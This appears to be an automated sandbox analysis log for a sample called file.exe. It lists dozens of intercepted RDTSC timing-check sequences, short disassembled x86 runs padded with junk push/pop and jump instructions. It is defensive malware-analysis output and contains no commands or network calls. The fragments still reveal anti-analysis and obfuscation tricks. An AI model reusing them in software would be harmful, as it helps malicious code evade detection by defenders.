                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6227 second address: 8F625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F98219BDB78h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F98219BDB6Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F62F4 second address: 8F631C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jbe 00007F9820CD6BB8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F9820CD6B96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F63FE second address: 8F6408 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6408 second address: 8F6412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F9820CD6B96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F647C second address: 8F6495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jmp 00007F98219BDB6Bh 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7432 second address: 8F744A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9820CD6BA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F72B2 second address: 8F72BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F744A second address: 8F746A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9820CD6BA4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F72BD second address: 8F72CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F72CA second address: 8F72E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F852A second address: 8F852F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F852F second address: 8F8564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9820CD6B9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop eax 0x00000016 nop 0x00000017 mov esi, 4657953Ah 0x0000001c push 00000000h 0x0000001e sbb di, 1260h 0x00000023 push 00000000h 0x00000025 clc 0x00000026 push eax 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FBDF8 second address: 8FBE0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FEDA5 second address: 8FEDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FEDA9 second address: 8FEDAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FEDAD second address: 8FEE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jl 00007F9820CD6B96h 0x00000012 popad 0x00000013 pop ecx 0x00000014 nop 0x00000015 jl 00007F9820CD6B9Ch 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F9820CD6B98h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 add bx, C264h 0x0000003c push 00000000h 0x0000003e jl 00007F9820CD6B9Ch 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 pushad 0x00000047 jmp 00007F9820CD6BA6h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FAF4D second address: 8FAF51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FAF51 second address: 8FAF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 900E69 second address: 900ECE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F98219BDB68h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007F98219BDB68h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f movsx edi, cx 0x00000042 clc 0x00000043 push 00000000h 0x00000045 mov dword ptr [ebp+1245B2D7h], esi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 900ECE second address: 900EDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 901ECE second address: 901ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 901ED3 second address: 901ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 901ED9 second address: 901EEC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 901EEC second address: 901F8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9820CD6B9Bh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F9820CD6B98h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F9820CD6BA1h 0x0000002b mov di, cx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F9820CD6B98h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov bx, 3E71h 0x0000004e mov edi, 0A50E832h 0x00000053 push 00000000h 0x00000055 sub dword ptr [ebp+122D35C0h], edi 0x0000005b xchg eax, esi 0x0000005c pushad 0x0000005d push ecx 0x0000005e ja 00007F9820CD6B96h 0x00000064 pop ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F9820CD6BA7h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 901F8B second address: 901F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 901F8F second address: 901FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F9820CD6B9Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 902F02 second address: 902F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a js 00007F98219BDB66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FEF2D second address: 8FEF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9820CD6BA5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FEF4B second address: 8FEF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F98219BDB66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9076C2 second address: 9076D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6B9Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9076D5 second address: 90770A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB77h 0x00000009 popad 0x0000000a jg 00007F98219BDB79h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90770A second address: 907723 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9820CD6BA4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 907723 second address: 90773E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jl 00007F98219BDB66h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90773E second address: 907743 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B6C21 second address: 8B6C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F98219BDB66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B6C2F second address: 8B6C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B6C4D second address: 8B6C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F98219BDB6Ch 0x0000000b jnl 00007F98219BDB66h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B6C61 second address: 8B6CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA7h 0x00000009 pop ecx 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F9820CD6BA5h 0x00000012 jmp 00007F9820CD6BA9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B6CB0 second address: 8B6CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F98219BDB66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B6CBF second address: 8B6CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B6CC3 second address: 8B6CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90104D second address: 901053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 901053 second address: 901057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909D2D second address: 909D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909D33 second address: 909D4A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F98219BDB66h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F98219BDB89h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909D4A second address: 909D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909D4E second address: 909DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub bl, 00000079h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 jng 00007F98219BDB79h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 sub dword ptr [ebp+12462B41h], ebx 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F98219BDB76h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 909DAF second address: 909DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90AE1A second address: 90AE20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90CCC8 second address: 90CCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90CCCE second address: 90CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90CCD3 second address: 90CCF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9820CD6BA7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90CEEA second address: 90CEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90CEEE second address: 90CEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9820CD6B96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90FE4B second address: 90FE54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 910426 second address: 9104A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F9820CD6B98h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 cld 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F9820CD6B98h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push 00000000h 0x00000043 mov bh, ACh 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 jmp 00007F9820CD6B9Ch 0x0000004c jmp 00007F9820CD6B9Ch 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jg 00007F9820CD6B96h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9104A4 second address: 9104BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90DF74 second address: 90DF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9106A0 second address: 9106B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91159F second address: 9115AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9115AD second address: 9115B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9125FB second address: 91260B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91260B second address: 912610 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91A5AB second address: 91A5C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F9820CD6B96h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jc 00007F9820CD6B96h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91A894 second address: 91A8A1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922205 second address: 922257 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9820CD6B9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F9820CD6BA4h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F9820CD6B9Fh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push esi 0x0000001c jmp 00007F9820CD6B9Dh 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922257 second address: 922272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB76h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92251E second address: 922538 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9820CD6B98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F9820CD6B98h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922538 second address: 92253E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92253E second address: 922542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922542 second address: 922552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922552 second address: 922556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922556 second address: 92255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278D4 second address: 9278E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9278E0 second address: 9278E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9266C6 second address: 9266CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926C22 second address: 926C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926C26 second address: 926C2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926C2B second address: 926C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F98219BDB6Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926C38 second address: 926C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F9820CD6B9Fh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F9820CD6B96h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926F22 second address: 926F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 926F2D second address: 926F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 927477 second address: 927480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 927480 second address: 927484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
